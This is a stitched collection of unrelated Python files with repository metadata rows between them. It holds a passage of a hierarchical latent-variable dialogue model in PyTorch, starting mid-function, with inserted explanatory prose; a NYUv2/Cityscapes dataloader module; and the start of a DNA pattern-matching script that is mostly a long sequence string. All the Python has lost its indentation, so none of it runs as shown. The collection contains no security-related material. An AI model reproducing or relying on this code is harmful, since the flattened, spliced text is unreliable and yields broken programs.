# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent
log_q_zx = log_q_zx_conv + log_q_zx_sent
log_p_z = log_p_z_conv + log_p_z_sent
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
log_q_zx = None
# expand z_conv to all associated sentences
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
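When `sentence_drop` is enabled, `forward` above replaces randomly chosen utterance encodings with the learned `self.unk_sent` vector before the context encoder sees them. A list-based sketch of that regularizer (hypothetical helper name):

```python
import random

def sentence_drop(encodings, unk_vector, drop_prob, rng):
    """Replace each sentence encoding with a shared UNK vector with
    probability drop_prob (the learned self.unk_sent above)."""
    return [unk_vector if rng.random() < drop_prob else enc
            for enc in encodings]

rng = random.Random(0)
out = sentence_drop([[1.0], [2.0], [3.0]], [0.0], 0.5, rng)
```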
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
context_hidden = context_init
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
samples = torch.stack(samples, 1)
return samples
ba11bc035846d32120914bc5efb5c7669c0026b3 | 2,868 | py | Python | dataset/__init__.py | FLHonker/MKAT-code | 39260ae70d5a304892031da2013a1be48d118f03 | ["MIT"] | 1 | 2022-02-28T15:16:35.000Z | 2022-02-28T15:16:35.000Z
from .cityscapes import Cityscapes
from .nyu import NYUv2, NYUv2Depth
from utils import ext_transforms
import torch
""" Segmentation """
def get_dataloader(args):
if args.dataset.lower() in ['nyuv2']:
train_loader = torch.utils.data.DataLoader(
NYUv2(args.data_root, split='train',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtRandomCrop(args.crop_size, pad_if_needed=True),
ext_transforms.ExtRandomHorizontalFlip(),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)
test_loader = torch.utils.data.DataLoader(
NYUv2(args.data_root, split='test',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.test_batch_size, shuffle=False, num_workers=args.num_workers, drop_last=True)
elif args.dataset.lower() == 'cityscapes':
train_loader = torch.utils.data.DataLoader(
Cityscapes(args.data_root, split='train',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtRandomCrop(args.crop_size, pad_if_needed=True),
ext_transforms.ExtColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),
ext_transforms.ExtRandomHorizontalFlip(),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)
test_loader = torch.utils.data.DataLoader(
Cityscapes(args.data_root, split='val',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.test_batch_size, shuffle=False, num_workers=args.num_workers, drop_last=True)
return train_loader, test_loader
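The `Ext*` transforms come from `utils.ext_transforms`; unlike torchvision's `Compose`, each transform takes and returns an `(image, target)` pair so that random crops and flips stay aligned with the segmentation mask. A minimal sketch of the pattern with a hypothetical paired flip:

```python
class ExtCompose:
    """Apply a list of paired transforms; each one maps
    (image, target) -> (image, target) so random ops stay in sync."""
    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, image, target):
        for t in self.transforms:
            image, target = t(image, target)
        return image, target

# hypothetical paired transform: flip image and mask together
def ext_flip(image, target):
    return image[::-1], target[::-1]

pipeline = ExtCompose([ext_flip])
img, mask = pipeline([1, 2, 3], ["a", "b", "c"])
# → ([3, 2, 1], ['c', 'b', 'a'])
```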
ba280a798058ffb4d949d0d78f11ba66fe59c959 | 15,823 | py | Python | Introduction to bioinformatical algorithms/Finding OriC/Approximate Pattern Matching.py | peterforgacs/bioinformatics-scripts | f4a497b84bc3cf0c295b7e6b506b9dd9c88e7881 | ["MIT"]
import timeit
start = timeit.default_timer()
pattern = "ACCGCTGTC"
string = "GAGTGCTCGATCCGGAAGAGTGAATCCTTTCAGAGCCCAACCCTCACGTCAATTAACTCCACAGAGATAAGTGCAGCACGTGGGTAGTTGCTGGGGGCATACCATGCCGCAGTCGAATTTTCCTTAGGACCCAGGGACTGGTCTTTACATAACAATATATCCCCTTACCTCGCCAACGGTAATCATTAAGTAAATCACACTCCATATGTGGGAAATCTATCTCTGGTTAGAGGCGAAGATCGATACGATAAAACCTTTACCCAGGGCAAACTTCAGGCATGAACTACCACAAAGACGAGACGTCCTCAGATAGTGAGAGTGAAAAATATGCGTGAACGCCTGATACCTCAAGGACCAGCGTTGGCAGGTATAGCAAACTATAGAAGACGCAGTAACGCGCCATCTGAAAGTTGTCGTGAATATTGGTGACAGCCTTGTCCGGGGGTCCGGATTCCAAGGCCAGCGAACCACTGAGTGGCTCTCGCGGGTAGAACTAGGATTCGTTTGACCACACCCGTGAAGTAGGTAGGTCCTTCGCACGGTCCCAACCAAGTCGTCTTCACTTAGTTTTCCCATCGAGATGTATAGAAGAAAGTGACATTTGAAGGTTAACTGGACTTAAACAGCGCTCTACACCTCAGGTCGCGTTCGTAATAATACCTTGTTCGGGGCAGAGAGTTTGGTGACTAAGAGGCACACGGGGAGATCCGAGCAATCGATCCCTATTCGGAATGGAATGCTCCCTTCAATGTCGCCGCTTAGGTACCCACGTACTGGCGCCTAACACGATTAGAGGTGCGTCTAGGAATTGTCGACTCAATGGCGTAGTTGCCTGTCTTTAGGAGGTCGTAGCTGTGGCCCTCGTCCTCGTCATCCGAGCTCTACCTTGGCTTAGTGGTATCGCATACAATAGAGTTGGAGCTGTATTACTAAGAAGTGGGCCGCATCAATTCTAGAGTACCGAACTAAACAGTCCCCAACGGTTGAAATATTGAAAATCCGATTGAACACTGCGAGTTTCCGTAGTACCGATAGTGTAGTGCGAGGCCCCTATGTGAACGCCGCTCCCGTGGACGTTAGAATTTCTCTGTTGCAACCTTGCGTTGGTGCCCTATTTGCATTCGTTCCACGGTTAGCCAACAGGATCAACTGAATTCTTTTGGCGAAAAGTGCGTTCAAACAGGTGAGTTAAGACGTATATTTCAGATTGAGAATTGGCTGTTACCGGGATGCAGGTGGCCAGGCGGTGTAACTAACCACGTTGGCGCTTCTGTTCAGTAAAGCGCCTCTGAGGGTGTCGCTCGAGGAGAGGCTCTCTGGGTGTGTGGGCCTTATATGATTGATTGCGCGTGACTATAAAATAGGTAGCGGTATCTGCACGTGGCACGGTTATTGGACGATCTGTGTCTCGATTTTCATACCGACGCTACGGACGAAAGACTAACGGAAATCTAAGTAACGAAATTAGATATTGAGCAGTCTTCGATCCCACTACGCCGGGGTATAAGATAAGACTCCACTAGTCGGAAACAACGTACTGGTACGTAAGACGACGCCCGTTTAGTTTCAGGAGAGAGCTACTGGTCTGATGCAATGTGGTCCTTCACCAATGTACAGCGCAGTGGGTTATGTTGGGGCTATAATTTGCAAACTCTTCGTCGGGCCCTGATCTGGCCCTGAGGGCGTGTTGATCATATCGCCGAGTCAAATCAGGAGGCATAAAAGCTTCCTAGTCTTAGCTAACAGGTCTTTGCCCCCATATCCGTGATTGCCTTAGGCGGGACCGGTCGCATCAGAGAGCAGCTTAACTGGAACAGCGTAGTTACTCTGGCTCTAACAGACGCTGCAATAGATCCAGGAACCTCCGCCGTGTCGGGGTCGCTTGGTCGCTTCCCCTGTGAGCATGAGAGAATAAATACGCACGCAAATGTGCCGCATACCCTGTGCTCTTTCAGACTTTGGACTTTGCCAAGTCGGTAAAAACCTTGAG
GCATGCCTCCGAACCTTATCCAGGTAACCCACTATACGTTATCAGTCATTCTACTGTGTACCACTGGGGTTGGGCCTCAGTAATACGTGGCAGGTAGGAACGAAACGTCCTCAAAACAACTCTACGCCTTTCTGAGGATGTCAGCTGTTAGCAAACCCGTGACGTTATAATTACGTAGCTTCCGCCCAAGAATTTAGCAACAATTACTTTACTCGTGACGTTCGATGGGATTTCGGAACCGTCGGGGGGAAGATGCAATTGACCAGCCTACGCAAACATCTGTCTAGTCAAGCCCGTATTAGTCTATAGATCTATGATTGCATCGCGCCGAATAACCTTGTTACCTGTAGGCGAGGAGACGGAAGTAGGCCGCGGGCCTAGTCGTCGTCGCCCGAAAACCGCTAACGAACGCTTAACCCTACGACGTAAGGCGATTAATGCCCCGCTTGATCGTTGTACTAAGAACAAGATGGCGAGCGCATGATTAATCTTGCGGCTTTTCACTAAAACTCCTGTCATCTAGATAGAACTGTTCTGTTTTCGCGAGGAGTATCTCGTGACCTTTAAGCAGTAGTAACATATCCGCAAAGATAACCTTCCGTATTAATTGAAACGAGGCACGTGTGATAACGATGGTGTTTCTCATGGGGACCCTTTCTAAGACGCATAAGAGCCGCGCCGGGTTCAGTAATAAGGTATAGAGCAACATAATGAAATCTTTCAACTGCACAATGCAGTGAGTGTCTACGGGGGGAGAGCATAAGGATCTTACAATACTGCGCCGAGCAGTCTGACATGACCGAGAACAGTGTGGGGGCGTGTGGGGTCCTTGGGCTCGCGCAGCCCACTACCGGACCGGGCGTTCTAGATAATTAGCGACATTTACGTCTGTGTCGACCTACAGACGACCGCAAACTAACCCCTTGGAGTATACTAATATCAACGCACTCAATACGATGTATACTGCGCATTGACGGTCATAACCTGTCGAAATAACTACTAACTACAACCCACCTGGATGCTAGACCGATCAGCAGAAGTATCACACTCCTAATCATATGAAACTAGGATCTAACCAAGACACCAAGCTGTCTGTCCTTGAGACTAGCTTAGCTTGTCTTTAGACCCCCCTAACACCGCAGCCACCATGTACACGCCAACCCTAGGGCGGGTGCTGGTCTAATCGCACAACACGCTCTCAAGACAGTGATGGATCGAGCCGCTCCCAAAGGCCGAGACCAAGTTAGACGACTCCGATGTCACTACGTGGATGAGGGATCGGATTTTCTGCTACTATGTAGTTGAAGGCATACTTAAACGTATATGCATGCACATGGCCAGTAGGGTGAGGGTCTATTATGATCTATTAGCGTGGTTTGGTGTCACGGATCTCATAAGCATATTGCAAGATACCCAAAGGGGCCTTAAGTACCAATCAAACAACATGGCCGGTGCCGATCCAGGATACTGTCACAGGCGTCGGGAGTGGCTGCTCGTTTAGCGGTAAGTGGGCACCTGAGAACTGCGTTACGTTCTCAAAGAAGGAATCCATGACGTACCATGTACTCCAATGGTCACGCTCCTTTGTCTAGTCAGCCTTACGTTACTACGGCGTTCCAACGCTAACTCTATGTCGAAAAACTGTCTATCGACACGTTCAGAAGTCATCTCTTCGGCTAGGATCGGTACCATAATCGGTCGACGACATGGTTCAGGAGAGACGATATCTAATATAAAAGGTATTAAGACCAATGCAACTCATAAGTCGGGAAGTGTTCGCCAGAAGCAACACCACATAATCGCTCATGACTTTATTTCCTATTCTCGGGGAGTCTGCATTAATGAAGAGGCGGATCACATTGCGCTCGCCACGGTAATCGTCTCCCGGCTCAAATATGTATTTATGCTAAAGGCCGCGGTACGATCAGTAATCTATCCGGGGCCTTTAAGGATTTTCGAATCCTTCTACACACAGTAACATACCGCGTAGCACGGAGGCA
CTTACGTACATGACTCACCATACCATTGCAGGGCTTCTAACATAAAAGACGTCAATATCAAATTCCGTCGATCTCATTCTAAGTGTTACAGTAGTCTAACAGGCCATCTTAGGTGAGGTTAATGGTTTCTTATGTATTATTGGAGGCGTTAGAGTCTTCGCGTTCCGATAGTGCGGCACGGGTGATTATGAACTCTTGATATCTCAAATCCCGCTTAGAACGACCAGTAAAGTTGACCGCTCCTCTAGTATAGTATGTGTTGGTGATCCACCACTTGCCATACAGCCTCTCTCGAGCACATTCCAGGCACTCGACAAGCCCTTGGCACCGCACCCCGTCAGGAAGGTCGCGTATAGCGCCCGAAAACAGCCCGGTCGGCGGTGGGAGGTCATGGGGGAGCCGCGCCCGTTCCTTGCATTCTATACAGGTGCGCTGAGGCTATTCCCGTAAATCGCCGGGATATTTTCGTTAGAACGGGTTCACTTATTACGTAAACAGTGCTTATGTGATTTTCATAGTTGGTGCCGAAGCGCAATATAGAAGGCCTTTGCGGCTAATAATCCTTACTTCGAAGCAGGCCTCAATGTGAGTACCGTATTTCAGATGATGGTACTTGAGGTCCCATTAAAACTCATTTTAAGAATGTATAGTGGAGACGGGCACTGCACACGGTGGGGTACAATACTACGGCATTTACACCGCACAATTCTTCAAGACGTCCATCTCCGGTGATGCTTCACACAGAGCCTAGTGGCTCTCTATGCGTCCAGGTGGGGCGATACACACAGTCCACAGCGTCGATGGCGAACCGGGGGTACGTCTGACTCAACATAAGTACTGCAGGCTGGAATTTGGACCTGGTTGTTCTAATTCTGCCATGGCGAAATGTCCGTGGGTGAGGAACAGTTGAGAGCTCGGTTCGGGGTGCGCAATTAGTTACACTTTGCTCGTCCGATAGAAGCGTGTCACGCGCCCGCATCCGTAAATTAACGTTAATAGTATACGCGGACCAGGAACTGAGCCTAACGCGTTAGATGGCTCACATCCACAAAGCGATCTCACCGTCATCGCGATTAGATCGTAACGTTCCGAACGTTGGATCAGAGCTCCAAACTTCCTTTCGCCCGGCTAGTTGCAGCTGCCATTGTCAACGTGCGGCTTTAAGTAACCGCACTCAGGATCTTATGAGTCCGGTTATCAACCTGGTCTTCAGGACGGGCAGCCCTGGTCACCGAGACTTTGGCAGGGTTGAGACGACGAATGGATCTTACACTGTCTAGACGCCGAGGCCATCCTTGTCTTGAGAGCAGCTCGGAAACCAATAATTGGGCCATTACCCTTGTGTCACGTGAAGATCTGGCATGGCTAAGCCACTTCCCCTCTGGGTAAGAACTGAGCGAGATAATTACGGGAGTCCGGCAGCCCACTCCGAGGACCACCTCACTTGACTCATACCTAGTCCTGCCGTAATCCCCTAACACCATCGTCTATTCATACCTGAGTAGTAATAATCTACGAACAGCGGTTTGGTATAGGCCTAGCGCGCAACCGAGCCAACGGAAAGTGCCACCATCGGGTAATACTTACTCGATGATCAGAGGTGCTCGTGGGGGTAAATCGGGGCTCTCCGGATTCGACCATAATGAATATCCCACATCCGAAATCCATTATAAGCATCCCGTTCTAGTTCGGATGACTGGATCGATTTCTGGAGCGATACCTTTCAAAGAAGCGGCGTCGTTGTAACGTTGAGGAGGGCGCCCGTGAAAATATCCCACCCGAGTTCATTGCTGCGCTCCGATCAATACAAACTCTGTGTCGCATAGTCGTGATTATGTCTCGTCCTATAAGTTAAAATTAACTTGAAATAGTTAAATGAGATATATGGATTCATCCTGGCAATAACATGTCGAGTGCAACCCTTATGGTACCAGGGCAGTGCCCACGGTCTTTCGGATAGATGGCCGACTACTCATGACGGCGAAATGATGTCGGATACT
ACTCCGCGGTTAACGGATGGCGCAAATCGAGTTGTTGTTAAGTTTACCCCACGGACTCGGGCGATTGACTCGCGAAACATCCCGCCCGCAAACCACTAAAGCGACAGGAACAATCGCTGATACAAAGGCTTTTTCGTCGTAGATAGCCTGAAAGTTGCCTCCTTTGGATATACAGAGTGCCGCTCTATATTCCTAGGAATATCCATGAGCTCATCTCAATTGCATCACCCTTTATCTGGCCAACTGGCCTGAAAAAGCGCGGATCCACCCCAGATCAGCCTCCAGTTTCAACTGAATCCACTTTCCGTATTAGCCGGAAAAGAAGTTTGTTCTCGGCAACAGGAGACTGCTCAAAGTAAGCGTCCACATCCGGATCAAAACGCTTAGAAGATGAGATGAGTTCCGACTAGAATTATGTAATGCAATTCTCTAGACGCCGAATAATCTACTGGACACAACCGAAACGTTTACACCGGCGAGATTTCTGCACAGATGAATCGCCAATGGAGAACATCATGGACATTAGCGTAGTTCACTCCCAATTATAGCAACGCGTCCTCCAACTAGCCTAACGATATCTGGGTAAAAGTGTTGCGGAATAGACGGGCCGTGTTCTGCCTTTAGGCATGGCAAGTGATAGGGCCACGTCTCATCGCGTATCTAGTTAGTATAACACGCACTGGCATTGCCCGTCATACAGGATTGCAGTTCTGACGACAGCAGGTTTAAAGTTCGGCTCTCAGCGTATGTCTTTACTAGACTAGGGTACCGACGGGTACTCGATGCTCCCCATAATATGGATCGGCCCAGCTCAGTATTTTGAACGCATTAGCTGGATTGAACCGCAGAAATTTACGTTATACCACATCGTAATACACCTACTTGCAGGCACTTCAATGGCTCTCTTTCTTGATCGATCCCGATGGCCTCATGGCTTCTCCCGTGTTTGAGGGCATAAGAATTCTGAGAGCCACGCGCACGGCTTTTGGCCTAGTAGGAACAATGAAAATAAGTGTGCGTCACTCTCGGTCATTGTTCGTAGGTTCGATTAGCTCATGACGGTGCTATTGCGCCGTTGTCTAAGAATTGCCCTGAGCCGCTTACAGCGTCTGAAGTCAGTCATGCACAGCACTATAGCATACGCCAGGGCCTTGAACTTTCAGTTGTCAAGGTAGTGAATCGGAATTGCGCCGGAGGTCATCGTCTCAGGAAGCGTCCTCGACGATCTAGTATTATTAAAAGAACAAAGGACGAGCGGCCCCGAAAGGGCACATCTTGCGTCGACAAGATTACGCACTGAATCACTTTGACCCTGGAATGGCCTGGACCATGCCCCCCGAGTTTGCTCCTAAGCTGTTGATAGTACTTGCCCCACGCTGGGGGAAGAAGCTTGCAGCACTCTGAGTTCGCGTCCGTACGCCATAGTTCCGCCCCCAAGATAGTTTTCCGCACGGTGCGGAACACAACTTATCTAAACGACTTGTTGGCTTTGTCATTCCAATCGCATGCACTGTTAACTGGCCCTGTTGACGCACGCACTAAATAAAATCTTTGAAAAATGGGATCCCTGGACACTGTGCACTTCTGCTGTCAAGCCTAGGTGTTCGCCTAGCCAGGTGCCCGATCAGAGTTATGTGCATAACTACCGATAGAAAGGACCTCATCATGATGTAGTATGGGCTTTAAAAGTGCGCTGATGCTACGATTGGTATCGTGCCACTTCATAATAGATTGGAGGTTACGAACAAGAATCGACCGAACACACGCTGTAGTCTAAAAAATGCCTACAAACGTGTGCACGCCCGCAATGGCCAGCGAAGTCCATGGAGATTGAGAGCAGTTCGGAGAAAATGGACTCATTTATTGTCTAAGTGCTTTGCATGTACTCCTTCAATCCTTTCGAAAGTCACGATCGAGAAAAAAACGCTCGGAGATTCCAACTGTACGGTGAGTCCACCCAACGCAGAACAGTCGATCTAGTCCCAGGCCTATACCAGGAG
CCTTCTAGGTGTACCGTTAGAATGCAACCCAATACTGCCTCAAGTGCGAAGAGTTCAGGCGCTTGTACAGATAACGGTCCCGTATATCCGAACAGTAGTATGCGGCCTAGCTCGGATGCACGGCCGAGACTTAACCTCATGTTAGCATGAAAGAGAGGCTACACGGAGAAAAGCTGCCCACCTCTACAACATCCAACAATTGACGATCAAGACCAATCTTCCCACGACTCGGGAAGACATGAGGCACAGGTGGTTCGCTATACTTGGAGTACTCCGGCGTCATGGCCTGTAACTTGTAACGACAGTGTGGTCACGTCAAGGAGCTATCAATAACCACGCCAAGTTAAGAATTGCCAACTCCGGGATACGGTAAGCCCGCGTGCAGGGGGGCAACACGAAAATCAAACAACATTACTCTGACAAGTCGCTTAGTTTATCTGATCGAGAATTTATGGGGTTTTCTGTGGCGATTAACCGCTCCACCATTTATAGAAAGTGTTAAACCGCCGATCCGATCTTTCCTTTCCAGATAGTCGGGACAAGTGACCGGATGTATGTACCCGTACCAGGGCGTGGTAGTCGGTCGTTCAATCTGGATAGGCCCTCGGAGGTTGTCCCAGTGCATGAACGCATAATAAATTCATGTCAATACAAAGCATTCGGGCGTCCGTGTAGTCACTCCAGCCCGTTTTGCTATCACGAATTGCGTCTTGAATGGTTGTCAGTGCCCTTTTAAATGAGGAAAATCTTTCTTAATAACCTCACCCTTTCTAAAAAGGGCAGTACGCATCTCCGTGCGGAAGGAATTTTCAAAATTTCATGCCAGCTTCTACGCACTCTTGCGTCGTAGCCAGCACTCCGTGAGCTCCGTACCAGCGGGGCGGGAGCGCAGTCTGATAAATTTGGGTTGTAGCCATCTTAATAAAAAAAATCGAAGCAAAAACGGATCGAGTGGACGCACGAGTATACTGGACACACACGCCTGGCAACGATTCCCAGCATGTCCACTAGGAGTTCAAGTCAGGTAGAAACTCCTGCATCAATATAGGATGCGGATCTTTGTCTCGGACATGTACTCGACAGTTGAGCTGGTCATCTTCCAAAGCTAAAACTGGGCGCTAACGGGGGTTGGGGAGACGGTACTTCTGGCGGTTTCGAGCAAGGTTGATAGACGACATGCGCTGGCTTGGGGAAGTGGCTCGCCATTGATGCATCATTGACGCGGCCTAAGAGGGGTCGGAGCTGTACTTTTAGGGCTGCACGGTAGATCCTAACAGTCATTTCTTTGAACCAGAGGAGCAGCTAAACTAGCACCTCCCACTGCTGACCCTGCTGTGTGGATTTGGCTTGGGCCGGTCAACTATCCTGCTCTCTAACATCGGGTACTATATTCCTCGCCTCGAGACGAAGTTTATCTGCCGGAGGCTCGTACGGACCGCAACTGGTAGCTTGATCGTTAGGAATCTTTTCACTTGGAAACTGTCGTACCGTGGAGAGTTAGCGATTTTATTGAGGGGACAGAAGTTGCCCCACCCTACATGTAACTCTTGGTTTATTGGTCTACGTGATAGTAACGTTGGATGATGCATCATTGGCTCATCATCACTTGACGTAGGTTAGACGTCCAGTGACGTCGATGGTATATACCTCTCTCTGCCACGGTGTGTTCGGTAGCTCTTGTCATCAGGGGCTACGCTAAGACATTTTGGTGTCCAATCTGTCCGTCCTGGTAGATCGCTAGCGCTCTAAGGCGTTTGTTCTCCCTGCTGCATTAAAGAATCTAGATGTTTGTCGAGTAAGTCTTGCTGGACAGGACCTGCGGGACTTGGTGACTTAGAGCTCGTAACGTAATACGTTACACTGTTACAACGATAAATACTTCACACTAACAATACACCTTTTGAACCGGCCAAAGCGAACGGGTTCGGGTACAATCTTTGTGCCTAAGGAACCCTGTACCTGCAGTGCTCGTTGCCCACCATCGGAAAGTTCGGAATCCA
